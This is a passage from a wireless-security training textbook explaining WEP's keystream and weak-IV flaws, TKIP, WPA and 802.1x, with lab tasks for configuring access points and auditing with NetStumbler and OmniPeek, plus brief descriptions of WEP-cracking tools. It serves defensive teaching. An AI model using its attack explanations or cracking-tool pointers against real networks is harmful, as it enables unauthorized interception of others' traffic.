a table of mapping known as plaintext to the ciphertext, the key streams can be
stored.
An IV collision is when the
IV is reused.
Lesson 9: Securing Wireless Networks 499
Figure 9-27: Example of the plaintext/ciphertext attack on WEP.
Earlier, you looked at some of the given equations of WEP. Recall that C
1
= P
1
XOR K and C
2
= P
2
XOR K, therefore, C
1
XOR C
2
= P
1
XOR P
2
. Therefore,
sniffing both sides of the AP will give the attacker the keystream when the
attacker XORs the ciphertext with the plaintext. The attacker need not decrypt the
stream; only know what the stream is.
By doing this enough times, the attacker can build what is called a decryption
dictionary. The decryption dictionary is a table that the attacker has built that
stores all the keystreams, mapping the IP and the key. Due to the WEP imple-
mentation, there are a maximum of 2
24
entries in the dictionary. Once the
dictionary is full, then the attacker can decrypt all WEP traffic. If the system is
fast enough, it may even happen in close to real-time.
If you recall that many systems reset their IV to 0 each time, this makes for a
much smaller keyspace used. Another problem is that systems are not required to
change the IV on each packet, again making smaller and smaller spaces that
require attacking.
Take a look at the following equation, to see how this works out in simple binary.
In this case, you are looking at just two bytes, but the process is identical for
larger amounts of data. Assume for this equation, you are the attacker.
0110100001101001 Known plaintext. (Known because you sent it.) This
is P
1
.
0110100111000101 Known ciphertext. (Known because you are sniffing
it.) This is C
1
.
1010001110101100 Learned stream. (Learned by XORing the plaintext
with the ciphertext.) This is now K.
When emailing the target,
sending a message of a
string of the same character
(such as all 5s) makes
comparison between
plaintext and ciphertext a bit
simpler.
500 Tactical Perimeter Defense
The attacker can simply perform this type of operation over and over, until all the
keystreams are identied. After the keystream is known, the attacker can take any
WEP message, look up the known data in the dictionary, and XOR the ciphertext
to get the plaintext. The attacker did not spend time trying to decrypt the key. In
this case, the attacker does not care what the key is, only the value of the key
stream.
The nal big push that led to the downfall of WEP as the primary security sys-
tem for wireless communications came in August of 2001. A paper was published
by Scott Fluhrer, Itsik Mantin, and Adi Shamir titled Weaknesses in the Key
Scheduling Algorithm of RC4. This paper included theoretical attacks on WEP.
One of the focus points in the paper was that of weak IVs. Since 802.11 uses
LLC encapsulation, there are weaknesses in the known formatting issues, such as
the plaintext of the rst byte known to be 0xAA (this is the rst byte of the
SNAP header.) Knowing the plaintext value of the rst byte, an attacker can sim-
ply XOR the rst byte of the Cipherstream with the known data to reveal the key
stream for that byte.
In the paper, this class of weak keys is analyzed. Every weak IV is used to attack
a specic byte of the RC4 key that is secret. The bytes of the key are numbered,
starting from zero. In a 40-bit WEP implementation there are 1,280 weak IVs.
You should be aware that the number of weak IVs that exist varies based on the
key length.
Therefore, if you elect to use the 128-bit WEP, the overall number of weak IVs
that exist increases. The 128-bit WEP has more than twice the number of weak
IVs than the 40-bit WEP. In the 128-bit WEP implementation (which uses 104
bits for the key), there are 4,096 weak IVs.
WEP Conclusion
Although by now you may feel that there is no practical value in utilizing WEP,
you should still take advantage of this option. Adding this layer of security
should be one of the starting points in the security of your wireless network, not
the end. By having WEP on the network, you may be able to remove the casual
attacker from any interest in your network.
Configure WEP
Up to this point, you have seen the creation of an ad-hoc wireless network, and
the creation of an infrastructure network. Although effective for fast setup and
simple congurations, this provides no security. The only time you should run an
unprotected network is in a controlled lab environment, where access to any pro-
duction machine of any type is impossible.
In this section, you will see the process of enabling WEP. Even though youve
learned that WEP can be cracked, if your wireless system does not support any
more robust security features, you must implement WEP as your bare minimum.
In this task, 128-bit WEP will be congured. The AP that will be congured to
use WEP is a Netgear WPN824.
Lesson 9: Securing Wireless Networks 501
TASK 9C-1
Installing the Netgear WPN824 Access Point
1. Log on to your Windows 2003 Server as Administrator.
2. Open the Network Properties of your LAN adapter.
3. Select TCP/IP, and click Properties.
4. Congure your LAN IP Address to allow you access to the Internet,
click OK twice, and then click Close. Note In these tasks, the Netgear
AP will recongure the Server to use DHCP by default to connect to the AP.
5. Insert the Netgear CD-ROM in the CD-ROM drive. If the setup program
does not autorun, navigate to the CD, and double-click the Autorun.exe le.
6. From the main menu, click Setup.
7. Read the Before You Begin instructions, and click Next.
8. Record your current network settings, as shown, and click Next. The
system will recongure to use DHCP as required.
9. Once the system has conrmed your setup and Internet connection, click
Yes.
10. In the Overview screen, click Next.
11. Review the screen to turn off the broadband modem, and click Next.
12. Review the disconnection of the Ethernet cable screen, and click Next.
13. Connect the Netgear Router to the Broadband connection, and click
Next.
14. Connect your Server to the Netgear Router, then click Next.
15. Power on the Broadband device, then power on the router, and click
Next.
502 Tactical Perimeter Defense
16. Wait while the system resets, and when you are at the Welcome screen click
the Advanced User URL that is shown in the window.
17. For User Name, type admin and for the Password, type password (these are
the defaults), and click OK.
18. If you receive a rmware update notice, check the Do Not Display Again
check box, and click Close Window. If you do not receive a rmware
update notice, move to the next step.
19. Type an IP Address of 10.0.10.50 a Subnet Mask of 255.255.255.0 and a
Gateway IP Address of 10.0.10.2
Congure the DNS Settings for your network. Then, click Apply. If you
are prompted for the user name and password, use the same credentials you
used earlier in step 17.
20. From the menu on the left side of the screen, click the Wireless Settings
link.
21. In the Name (SSID) text box type SCP-2
Leave the Channel and Mode at their defaults.
22. Under Security Options, select the WEP radio button. The WEP options
will be enabled when you make this selection.
23. Keep the default Authentication Type as Automatic, and in the Encryption
Strength drop-down list, select 128bit.
Lesson 9: Securing Wireless Networks 503
24. Select the Key 1 radio button, and in the Passphrase text box type
SECRET1 and click the Generate button. (Note the system is designed
to only populate one Key eld at a time, but at times the system will popu-
late all elds. If this is the case copy and Paste each key to Notepad.)
25. Select the Key 2 radio button, and in the Passphrase text box type
SECRET2 and click the Generate button. Repeat this pattern for Keys 3
and 4.
26. Once all four keys are entered, click Apply.
27. Enter the Netgear credentials, and click OK. The settings will be updated.
Establishing the WEP Network
With the Access Point installed and congured to use WEP, you will now need to
congure the clients to use the same security settings. Since the AP is congured
to use four different WEP keys, these exact same keys will be required on each
WEP client. The client to be congured will be the Netgear Client.
The WEP clients and APs use the same keys. You will use the following
keyphrases and keys:
SECRET1 - D26BC1D2A0BFE7F09BBF02349C
SECRET2 - 30FC02118708A87A1A2CB06E1B
SECRET3 - 014DAAF8F9BEECA7E046D7C2AC
SECRET4 - F41FB818ED33EDD64D38E62BA0
504 Tactical Perimeter Defense
TASK 9C-2
Configuring WEP on the Network Client
1. Log on to the computer that has the Netgear WPN511 installed.
2. In the Windows system tray, click the Netgear WPN511 Smart Wizard
icon.
3. Click the Networks tab.
4. Click the Scan button to locate the new network. Note that the new WEP
network is located.
5. Select the SCP-2 network, and click the Connect button. Note that you
are brought to the main Settings tab when you do this, and that both the
SSID and WEP options have been selected.
6. In the Passphrase drop-down list, select 128 bits.
7. Verify that Key 1 highlighted under the Enter Key Manually drop-down
list, and in the Passphrase text box type SECRET1 (notice that the Key is
automatically generated.)
8. Select Key 2 in the drop-down list, and type SECRET2 in the
Passphrase text box.
9. Select Key 3 in the drop-down list, and type SECRET3 in the
Passphrase text box.
Lesson 9: Securing Wireless Networks 505
10. Select Key 4 in the drop-down list, and type SECRET4 in the
Passphrase text box, then click the Apply button. You are now connected
to the WEP network.
11. If you wish, open a Command Prompt and ping 10.0.10.2 (the AP) to
verify the connection.
Temporal Key Integrity Protocol (TKIP)
TKIP is not specic to Wi-Fi Protected Access (WPA), but is utilized by WPA.
TKIP was developed to correct some of the weaknesses found in the WEP RC4
process. TKIP still uses RC4 as the core cipher, but from there the process
changes. TKIP forces a new key to be generated every 10,000 packets, and it
hashes the IV so that the IV becomes encrypted, and therefore not as easy to
sniff.
The simple step of hashing the IV means that the previous problem of turning a
64-bit key into a 24-bit plaintext and 40-bit secret is now gone. TKIP also
includes a method of verifying the integrity of the data called the Message Integ-
rity Check (MIC). The MIC will allow for conrmation that the packet has not
been altered during transit.
Although TKIP strengthens (not replaces) the WEP process, and provides an
increase in the security of the network transmissions, it should not be considered
the ending solution to the security of the wireless network communication. This
is because the system still will fall to the cracking of the single password (or
keyphrase) that was used to initiate the whole system. If that secret is discovered,
the entire system is compromised.
Extensible Authentication Protocol (EAP)
Extensible Authentication Protocol (EAP) is not a wireless-specic protocol. EAP
is used in many different systems, both wired and wireless. EAP, in the simplest
denition is a means of validating a remote access connection.
TKIP is not a replacement for
WEP.
506 Tactical Perimeter Defense
EAP is not tied to a specic authentication technology, meaning that it will work
with certicates, smart cards, tokens, challenge/response systems, and so on. In
the case of wireless security, EAP has been applied to authenticating remote wire-
less users.
Wi-Fi Protected Access (WPA)
WEP is not the only solution to securing your wireless communications. Another
solution is called Wi-Fi Protected Access (WPA). Behind WPA is the Wi-Fi Alli-
ance, which is an organization deeply involved in wireless interoperability issues.
WPA is designed to meet two goals: strong protection via encryption, and strong
access control via user authentication.
The rst goal of user authentication is provided with the use of 802.1x + Exten-
sible Authentication Protocol (EAP). The second goal of encryption is provided
with three items: Temporal Key Integrity Protocol (TKIP), Message Integrity
Check (MIC)called Michael, and 802.1x dynamic key distribution. This means
WPA = 802.1x + EAP + TKIP + MIC.
The WPA Process
There is a sequence of steps involved in the WPA process. These steps are differ-
ent for an Enterprise implementation and a Small Office Home Office (SOHO)
implementation. In the SOHO implementation, a matching password is congured
on the AP and the client. When the passwords are checked and matched, then
cryptographic keys are exchanged and the encrypted session begins. Although the
authentication is simplied to the matching password for the SOHO implementa-
tion, the encryption process is the same for the SOHO as the Enterprise.
The formula for WPA is:
WPA = 802.1x + EAP + TKIP
+ MIC
Lesson 9: Securing Wireless Networks 507
Figure 9-28: The Enterprise implementation steps of WPA.
In the Enterprise, there are several more steps in the overall process. The rst
step is the association of the client to the AP. Once the client associates, the sec-
ond step is for the AP to prevent the client from accessing the LAN segment until
the client has authentication. The third step is the client providing authentication
credentials to the authentication server. If the client successfully authenticates,
then the process moves to step four, if the client does not authenticate, then the
client will remain blocked from the LAN segment. The fourth step is for the
authentication server to distribute the required cryptographic keys to the AP and
the client. The fth step is for the client to join the LAN, using the keys to
encrypt all the communications between the AP and the client.
Hardware Requirements
In order to take advantage of all that WPA offers, you will need to be sure that
your network is able to run WPA. Access Points and other wireless equipment
will have to have been enabled to use WPA. Most newer devices are enabled for
WPA, but older models may require upgrades to support it. In addition to the APs
and clients supporting WPA, you will need an authentication server. This should
be any strong authentication server, such as a RADIUS server.
WEP and WPA Comparison
Although the technologies are different, there is a natural tendency to compare
WEP directly with WPA. Here is a quick comparison of some of the primary
points between these two security mechanisms.
508 Tactical Perimeter Defense
WEP WPA
40-bit keys 128-bit keys
Static key Dynamic keys
Manual key distribution Automatic key distribution
Looking at those three points alone should provide ample reason for migrating
the enterprise to WPA as a security solution over WEP. A nal point is the
authentication systemsin WEP there is no unique authentication required by the
users, whereas in WPA the user must authenticate with the authentication server.
Configure WPA2
For this task, it is assumed that the initial WAP54G installation and conguration
is nished, and the task is specically designed to congure WPA. Once the AP
is congured to utilize WPA, then the WNICs will be congured to connect to
the WPA-protected network.
TASK 9C-3
Configure WPA2 on the Access Point
1. Log on to your Windows 2003 Server as Administrator.
2. Open a web browser, and point to http://10.0.10.1 (or, if different, what-
ever IP Address you assigned to the WAP54G).
3. Leave the User Name empty, and type admin as the Password, then click
OK
4. Click the Wireless tab, and under the Basic Wireless Settings, change the
Network Name (SSID) to SCP-3 and click the Save Settings button.
When you get the prompt that your changes have been saved, click
Continue.
5. On the Wireless tab, click the Wireless Security option.
6. In the Security Mode drop-down list, select WPA2-Mixed.
7. In the Passphrase text box, type SCNP4ME!
8. Click the Save Settings button. When you get the prompt that your
changes have been saved, click Continue.
Supplicants
While several makers of wireless networking equipment have made their cards
able to understand the higher-level security features, such as WPA, there are
issues currently in getting the WNIC to connect to the AP using WPA. The use of
supplicant applications helps to smooth out this process.
Lesson 9: Securing Wireless Networks 509
It is important to note that you may need to download a supplicant in order to get
WPA running on your system. The supplicant is the piece of code that allows
your new card to actually use the features of WPA. This is especially true in
legacy systems, such as Windows 2000. Microsoft has released a WPA patch for
Windows systems, and Funks Software has released a third party solution called:
Odyssey.
With the AP now congured to use WPA2, you need to congure your client
computers to match this security setting. In this next task, you will congure the
Linksys WNIC client to use WPA2 security.
TASK 9C-4
Configuring WPA2 on the Network Client
1. Log on to the computer that has the Linksys WPC54G installed.
2. In the Windows system tray, right-click the Linksys WPC54G monitor
icon, and choose Open The Monitor.
3. Click the Site Survey tab. Notice the new WPA2 security-enabled AP is
listed.
4. Select the SCP-3 WPA2 secured network, and click Connect.
510 Tactical Perimeter Defense
5. Verify that the WPA2-Personal option is selected, type SCNP4ME! Iin
the Passphrase text box, and click Connect.
6. In the Congratulations screen, click Connect To Network.
7. In the Link Information screen note that you are now connected to the
Access Point. Click the More Information button.
8. If you wish, open a Command Prompt and ping 10.0.10.1 (the AP) to
verify the connection.
Lesson 9: Securing Wireless Networks 511
802.1x
While industry groups such as the Wi-Fi Alliance are working on security solu-
tions, so is the IEEE. The 802.11i working group is focused on the security issues
of the 802.11 wireless networking standards. The group is working towards the
802.1x standard, which will dene the authentication framework of the 802.11-
based networks.
The 802.1x standard is based upon EAP, and will provide for the exibility to use
multiple authentication algorithms, since it is an open standard. Vendors will be
able to implement and advance the technology in along the standard.
In this system there are three primary components, the end client, the access
point, and the authentication server. Although it is common for the authentication
server to be a RADIUS server, there are no specications requiring RADIUS.
This leaves the design open to t your specic situation.
Topic 9D
Wireless Auditing
Since the wireless network is so dynamic, in order to maintain proper security,
regular auditing is required. This is in addition to the normal auditing and analy-
sis of your wired network. Since the wireless network has no true boundary, your
auditing must be specically targeted towards this segment of the enterprise.
A complete audit of the wireless network should inform you of all the APs all the
WNICs and any other signicant information, for example, are the APs in the
network broadcasting their SSID? One method of attack is to add a rogue AP on
the edge of your network, allowing for the range to be increased across the street
or into another building. Without proper auditing, you may nd this out only after
it is too late.
Site Survey
One of the primary, and most basic, wireless auditing tasks is called the site
survey. This is a primary task because the wireless network is an ever-changing
network, with dynamic boundaries. Even if the nodes in the network remain
static, the bandwidth use may be dynamic, causing transmission rates to modify
during the course of communication.
The BSS and ESS that are running in the wireless network can recongure them-
selves to use the lowest common denominator of bandwidth when associating
with nodes and other APs. Analyzing the packets on a given channel of an AP
can indicate the strength of the signal and the size of the packets transmitted.
If it seems that all the packets are small in size, then there is the possibility that
interference is causing the small size. Through your analysis you can now alter
the settings of the AP or move it to a different physical location.
512 Tactical Perimeter Defense
WNIC Chipsets
Although not specic to the concept of auditing or the wireless network, you
need to be aware of the WNIC chipsets in order to utilize many of the wireless
auditing tools. The reason for this is that there are several different manufacturers
of wireless chipsets, and this is important because the tools and drivers are actu-
ally interacting with the chipset itself. When looking for interoperability with
your O/S or auditing tool, you may need to know which chipset is in your card,
and which chipsets are compatible with that specic tool.
For 802.11b networks, two common chipsets are Prism and Hermes. The Prism
chipset is on a wide variety of cards, such as Linksys, D-Link, and Netgear. The
Hermes chipset is often found in Proxim cards, specically the ORiNOCO cards.
Many wireless tools work best (and, for some tools, only) with the ORiNOCO
card.
For 802.11g networks, two common chipsets are Atheros and Broadcom. Many
different card vendors use these different chipsets. In this lesson, both the Linksys
and Netgear client cards use an Atheros chipset.
Wireshark
Wireshark is one of the leading network analysis tools, and runs on both Win-
dows and Linux platforms. Wireshark can capture all the packets on a network
card, and present those packets for analysis. Complete details on Wireshark net-
work analysis is out of the scope of this book. Even though Wireshark runs on
both Windows and Linux, the support for analyzing 802.11 packets is better on
Linux.
NetStumbler
Perhaps one of the most famous wireless tools, NetStumbler should be a part of
all wireless auditing tool kits. NetStumbler works with a wide variety of cards,
with a full is available here: www.stumbler.net/compat This tool, once loaded on
your computer can detect 802.11 networks, identify the SSIDs, identify the secu-
rity in place, identify the channel used, and so on.
There is a mapping function in NetStumbler that creates a graphical image, on a
map of the area, of the location of APs. Since the tool allows for GPS integra-
tion, you can even use a GPS device to identify the exact longitude and latitude
of the AP for plotting onto a map. Furthermore, you can output your results to
the mapping software MapPoint.
NetStumbler will identify, on screen, the SSIDs of the networks that it nds, and
will report whether or not that network is using WEP. If the AP is using WEP, a
small lock icon will appear in the circle next to the MAC address of the AP.
Installing NetStumbler is very simple, just execute the application and a desktop
icon will be created. Double-click the desktop icon, and NetStumbler is ready to
go. The only issue is making sure that the WNIC you use is supported by
NetStumbler. Supported cards require no additional steps, NetStumbler will sim-
ply use the card upon running the application. The web site,
www.netstumbler.com, is where you can go to nd the current updates regarding
the supported cards.
Lesson 9: Securing Wireless Networks 513
TASK 9D-1
Installing NetStumbler
1. Log on to the computer with the Linksys WPC54G installed.
2. On your course CD-ROM, navigate to C:\Tools\Lesson9\
NetStumblerInstaller_0_4_0.exe (note if you do not have this le, you
may download it from www.stumbler.net).
3. Double click the NetStumbler_0_4_0.exe le to begin the installation.
4. Read the License Agreement, and click I Agree.
5. Leave the default selection of a Complete Install, and click Next.
6. Accept the default installation directory, and click Install.
7. Once the install is complete, click Close.
8. If you wish, read through the Release Notes, then close the Release Notes
window.
Identify Wireless Networks
After you have NetStumbler installed, you can quickly analyze your network to
nd active access points. Once you have identied an access point, you can dig a
bit deeper to determine the MAC address, the SSID, encryption use, signal
strength, and (if you have GPS connectivity) the longitude and latitude of the AP.
In the previous gure, you can see that NetStumbler has located three APs
nearby. NetStumbler has identied the SSID, Channel and MAC address. The
vendor name is estimated based on the MAC address, as specic MAC addresses
are assigned to specic vendors. This is not always accurate however, as MAC
addresses can be changed. In the test lab for this gure, two APs are Linksys, and
one is Netgear.
When using NetStumbler, you are able to identify if you are associated with a
network by looking to see if your MAC address is in bold. In the example gure,
the MAC address 0018390FFA5D is bolded, to the machine that created this
example is associated to the network on Channel 6, and using SSID SCP-3.
514 Tactical Perimeter Defense
Notice as well that NetStumbler has identied the Encryption on SCP-2 and
SCP-3 as WEP. While SCP-2 is using WEP, the SCP-3 network is using WPA2,
so although NetStumbler did correctly identify that encryption was in use, it did
not delineate the difference between a WEP and WPA2 encrypted connection.
You should keep this in mind as you are using your wireless tools. While not
clearly dened from a legal viewpoint, connecting to an Access Point may be
considered unauthorized access. If your WNIC is set to DHCP, your system may
associate and you may be given an IP Address very quickly. Be careful that you
do no associate and join a network that you had no intention of using.
TASK 9D-2
Identifying Wireless Networks
1. Log on to the system that has NetStumbler installed.
2. Double-click the NetStumbler desktop icon. (If no icon was installed, you
can nd NetStumbler in your Programs menu.)
3. NetStumbler will automatically run a scan and locate active Access
Points within range of your system.
4. Examine the results and locate the following information:
What are the network types identied?
What are the channels used?
Is your system associated with any network?
Which networks are using encryption?
5. Close the NetStumbler application. At this time, there is no need to save
the le results, unless you wish to have them for later analysis.
OmniPeek Personal
There are many products designed to perform wireless network analysis directly,
and one of them is part of a bigger product called OmniPeek, a commercial prod-
uct from Wildpackets. OmniPeek Personal can be downloaded for free for
personal use only from the WildPackets site: www.omnipeek.com. To use
OmniPeek in a commercial environment, you must buy a license to the
OmniPeek Workgroup or Enterprise products.
One thing OmniPeek Personal is not designed to do is to crack WEP. There are
other tools designed for this purpose. If you have WEP running in your network,
you can however, input the WEP keys and OmniPeek Personal will decrypt those
packets on screen. By decrypting the WEP signals, you can use OmniPeek Per-
sonal to analyze higher layer communications as well.
If you have time, visit the
site: www.wigle.net There
is an interactive map that
you can zoom in on down
to the level of seeing the
name of individual SSIDs
that have been discovered
via wardriving.
Lesson 9: Securing Wireless Networks 515
Installation of OmniPeek Personal is very straightforward. OmniPeek Personal
will not work with every WNIC made, but supports quite a few brands and types
of cards. OmniPeek Personal supports various 802.11a, 802.11b, 802.11g, and
802.11 combo cards. You will need to be sure that your card is one that is
supported. Once you know that your card is supported, you will then update the
WNIC with a WildPackets driver for that specic card. Once the driver is
installed, then OmniPeek Personal is ready to run on your system.
TASK 9D-3
Installing OmniPeeK Personal
Setup: OmniPeek Personal requires Microsoft .NET Framework 2.0.
If your system does not have this installed, please visit
www.omnipeek.com/downloads.php and follow the link to
Microsoft to download the current version.
1. Log on to the system that has the Linksys WPC54G installed
2. From C:\Tools\Lesson9, double-click WildPackets_OmniPeek_
Personal41.exe.
3. If your security system generates a Security Warning pop-up, click Run. If
no pop-up is created, proceed to the next step.
4. In the InstallShield Wizard, click Next.
5. In the Name text box, type your rst name and in the Company Name text
boxtype, SCP and click Next.
6. If you wish to receive WildPackets updates, click Next. If you do not wish
to receive WildPackets updates, uncheck the check box, then click Next.
7. Read the features offer in the OmniPeek Workgroup Pro upgrade, and
click Next.
8. Read the terms of the License Agreement, select the radio button if you
accept, and click Next.
9. Read through the Installation Notes, and click Next.
10. If your system does not have Microsoft .NET Framework 2.0 installed, you
will be prompted to download .NET 2.0. If you do need to perform this
download, click OK. If your system already has .NET installed, skip to
the next step.
11. Leave the default selection of a Complete Install, and click Next.
12. Conrm your settings, and click Next to begin copying les. The software
will now be installed to your system.
13. Once the install is complete, uncheck the box to view the Readme,
uncheck the box to Launch OmniPeek, and click Finish.
516 Tactical Perimeter Defense
WildPackets Drivers
OmniPeek Personal requires the installation of a special WildPackets driver in
order to use a wireless card with an Atheros chipset. Note, that once you have
installed the WildPackets driver, if you wish to revert to your previous congura-
tion, you will need to reinstall the factory drivers that came with your WNIC. In
this book, you will be using the OmniPeek les that are included as samples, so
no driver installation is required.
OmniPeek Personal Captures
OmniPeek Personal has several congured packet captures saved for you to use.
Viewing these sample captures will give you an insight into the process of using
OmniPeek Personal, without the requirement of you setting up a complex wire-
less lab. If you are going to move further in your career as a wireless network
analyst, you will build and manage your own lab, so this is not an issue, but for
the classroom, these captures are a great tool.
OmniPeek Personal can work as a network troubleshooting and maintenance tool,
in addition to providing the information you need to run security audits. The tool
can tell you bandwidth use, packet transmissions, and errors all through it easy to
read visual gauges.
The full details of this tool are beyond the scope of this course, but one of the
features you will likely want to familiarize yourself with is the peer map. The
OmniPeek Personal peer map will help you to actually visualize the traffic in
your network. Connections are given colored lines, with the line getting thicker
based on utilization. In the peer map, you can grab a node with your mouse and
move it on screen, with the lines moving in relation, and allowing you to adjust
the view to your liking.
TASK 9D-4
Viewing OmniPeek Personal Captures
1. Log on to the system where you have installed OmniPeek Personal.
2. Navigate from the Start menu to the WildPackets OmniPeek Personal
installation.
Lesson 9: Securing Wireless Networks 517
3. The rst time the application runs, you must dene a network adapter. In
this course, you will not be using an adapter. In the Monitor Options screen,
select None, and click OK.
4. Choose FileOpen.
5. Navigate to the folder location where you installed OmniPeek Personal.
Open \OmniPeek Personal\Samples\Wireless.
6. Select association.apc and click Open.
7. What is the function of the packet found in line 4?
It is the broadcast looking for a wireless network to join. This broadcast is
called the probe request.
8. What is the MAC address of the node that sent the Probe Request?
00:A0:F8:9B:B9:AA
9. What is the function of the packet found in line 5?
It is the response from the AP that it will accept connections. This response
is called the probe response.
10. What is the function of the packet found in line 8?
A request to use open authentication.
518 Tactical Perimeter Defense
11. Right-click line 8 and choose Select Related PacketsBy Flow. Click the
Hide Unselected button. You will be left with only the packets related to
that specic conversation.
12. What is the subtype of the authentication request in line 8?
It is Subtype: 1011 (Authentication).
13. What is the status code of the authentication response in line 10?
It is listed as Successful, so this packet is to inform the client that the
request is granted.
14. Choose EditUnhide All Packets.
15. Double-click line 3, which is a Beacon packet.
16. Note the type and subtype of this packet.
17. Click the green right-arrow. This arrow is found two rows under the File
menu.
Lesson 9: Securing Wireless Networks 519
18. What is the type and subtype of this packet?
Type 00 (Management) and 0100 (Probe Request).
Continue to click the green arrow, noting the different Types and Sub-
types, as they are associated to different packets.
19. What is the type and subtype for a probe response?
Type 00 (Management) and 0101 (Probe Response).
20. What is the type and subtype for an 802.11 acknowledgement?
Type 01 (Control) and 1101 (Acknowledgement).
21. What is the type and subtype for a beacon?
Type 00 (Management) and 1000 (Beacon).
22. What is the type and subtype for an 802.11 authentication packet?
Type 00 (Management) and 1011 (Authentication).
23. What is the type and subtype for an association request?
Type 00 (Management) and 0000 (Association Request).
24. What is the type and subtype for an association response?
Type 00 (Management) and 0001 (Association Response).
25. Choose FileClose to close the packet details.
26. From the left menu, under Statistics, click Protocols.
27. Notice the percentages of each protocol in this capture. When nished,
choose FileClose. Keep OmniPeek Personal open for subsequent tasks.
520 Tactical Perimeter Defense
Live Captures
Although it may not be a part of your daily tasks, there will be times when you
wish to view captures as they happen. These live captures can then be saved for
later analysis, or you can look for trends as they are happening. There is a feature
built into the program to simulate the live capture of packets, so you do not need
to have a suitable WNIC installed.
TASK 9D-5
Viewing Live OmniPeek Personal Captures
1. Choose CaptureStart Capture.
2. In the Monitor Options, select the File option, and click OK.
3. In the File Name box, browse to \WildPackets\OmniPeek Personal\
Samples\Wireless\Demo.apc, and click Open. (Note you may need to
change the le type to view .apc les.)
4. Choose CaptureStart Capture.
5. Click the green Start Capture button.
6. Allow the capture to run for some time. When you reach approximately
700 packets, click the red Stop Capture button.
7. Leave the application open for upcoming tasks.
Lesson 9: Securing Wireless Networks 521
Non-802.11 Packets
Although you may wish to spend the majority of your time analyzing the 802.11
packets and associated wireless networking issues, OmniPeek Personal can cap-
ture all traffic. This allows you to perform analysis on all network traffic if you
wish. In the following task, you will examine all the traffic captured, and view
the OmniPeek Personal options for analysis.
TASK 9D-6
Analyze Upper Layer Traffic
Setup: This task assumes that the Demo.apc le is open.
1. Right-click line 16 and choose Select Related PacketsBy Flow.
2. Click the Hide Unselected button.
3. What are the IP Addresses of the nodes in this conversation?
192.168.0.11
192.216.124.4
4. Which packets dene the three-way handshake?
Packets 16, 19, and 21.
5. What website is being accessed in these packets?
www.wildpackets.com (This is the maker of OmniPeek Personal.)
6. Double-click any HTTP packet.
What is the type and subtype of the packet?
Type 10 (Data) and 0000 (Data Only).
7. Double-click line 23.
522 Tactical Perimeter Defense
Looking at the MAC addresses and last bit of the frame control ags, do
you suspect this to be an ad-hoc or an infrastructure network?
An infrastructure network, there are three addresses in use, and the ToDS bit
is set to 1.
8. Choose FileClose. Click No, as you do not need to save this capture le.
9. Leave OmniPeek Personal open for the next task.
Decode WEP
If you are analyzing traffic on your network, you know what the WEP key is. In
this case, you are not cracking, but you will utilize the key to decrypt WEP-
protected data on screen. OmniPeek Personal has an option to UnWEP packets,
allowing you have the required key.
TASK 9D-7
Decrypting WEP
1. If it is not already open, open OmniPeek Personal.
2. Choose FileOpen.
3. Browse to \WildPackets\OmniPeek Personal\Samples\Wireless\telnet-
wep.apc and click Open. Notice that under the Protocol column, no
protocol information for higher layers is available. (You can reorder the col-
umns, if you wish).
4. Double-click packet 6.
5. What is the type and subtype of this packet?
Type 10 (Data) and Subtype 0000 (Data Only).
Lesson 9: Securing Wireless Networks 523
6. According to the frame control ags, is WEP enabled, and is this likely
for an ad-hoc or an infrastructure network?
Yes, WEP is enabled, and the ToDS bit is set, so this is an infrastructure
network.
7. What is the WEP IV for this packet?
0x050100
8. To get back to the main packet list, close the packet details.
9. Choose ToolsDecrypt WLAN Packets.
10. Select the Encrypted Only radio button and click the button to the
right of the Use Key Set text box.
11. Click the Insert button.
12. In the Name text box, type UnWEP1
In the Key 1 text box, type 0123456789 and in the Key 2 text box, type
9876543210
Click OK. These values are part of the OmniPeek Personal demo.
524 Tactical Perimeter Defense
13. In the Key Sets window, click your newly created unWEP1 set, and click
OK.
14. In the Decrypt WLAN Packets window, click OK to perform the
decryption with the UnWEP1 keyset. It will only take a brief moment to
perform the decryption. You will see right away that the packets are
decrypted, and the protocols and other details are now exposed.
15. Starting with packet 1, what are the other packect involved in the three-
way handshake?
Packets 1, 2, and 3.
16. What IP address is associated with the Telnet client?
192.168.0.11
17. What packet holds the login request from the Telnet server?
Packet 8.
Lesson 9: Securing Wireless Networks 525
18. Examine the details of lines 9, 12, 15, 18, 20, 24, 27, 30. What can you
learn from the information in these lines?
You can learn the login is sysadmin. (Note Look at the values presented
in the Line 1 eld of these packets together.)
19. What does it appear that the password is for this login session?
The password looks like foo. From lines 36, 39, and 42. (Note Look at the
values presented in the line 1 eld of these packets together.)
20. Which packets are used to end the Telnet session?
Packets 63, 64, 65, and 66.
21. Double-click line 63. This is the Ack/Fin to close the session from the
Telnet server.
22. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 0 and the FromDS bit is set to 1.
23. After you identify the bit setting, click the green right-arrow to move to
the next packet. This is packet 64, the return Ack to the server.
24. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 1 and the FromDS bit is set to 0.
25. After you identify the bit setting, click the green right-arrow to move to
the next packet. This is packet 65, the Ack/Fin from the client to the server.
26. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 1 and the FromDS bit is set to 0.
27. After you identify the bit setting, click the green right-arrow to move to
the next packet. This is packet 66, the return Ack from the server.
28. What is the setting of the ToDS bit and the FromDS bit?
The ToDS bit is set to 0 and the FromDS bit is set to 1.
29. After you identify the bit setting, click the green right-arrow to move to
the next packet.
30. Close all open windows. Click No if you are prompted to save the le,
and click Yes to Exit OmniPeek Personal.
Aircrack
Aircrack is a whole set of wireless tools, that work in 802.11a/b/g networks.
Included in this suite is Airodump, a wireless packet capture program and
Aireplay, which is a wireless packet injection tool, and the ability to crack WEP
encryption. By using packet injection, the tool can ensure that enough packets are
available for decryption.
526 Tactical Perimeter Defense
WEPCrack
As the name directly implies, WEPCrack, which runs best on UNIX systems, is a
wireless tool designed to crack WEP keys. One thing to note, is that this tool will
require a lot of packets to do its job. It must sniff and analyze the packets,
searching for the weak IV it can exploit.
The amount of data that you need to capture before WEPCrack can crack the
code can be seven or eight gigabytes. Of course it is possible that redundancy
will be found earlier, but you should be aware that this is not a fast or instanta-
neous process like some of the online password cracking utilities.
AirSnort
AirSnort, like WEPCrack, can crack WEP keys, and is also designed to run on
Linux. AirSnort, once activated, can crack WEP automatically without user input.
This tool will run on both the ORiNOCO and Prism chipsets, but seems to have a
preference towards using the ORiNOCO cards. If not already, you can expect
AirSnort to become a required tool in all wireless analysts tool kits in the very
near future.
Ekahau
Ekahau is a wireless auditing tool that allows you to pinpoint the actual physical
location of wireless devices in your network. Using this tool, you make a map of
your office, and then perform a survey of the office. Once the survey is done, the
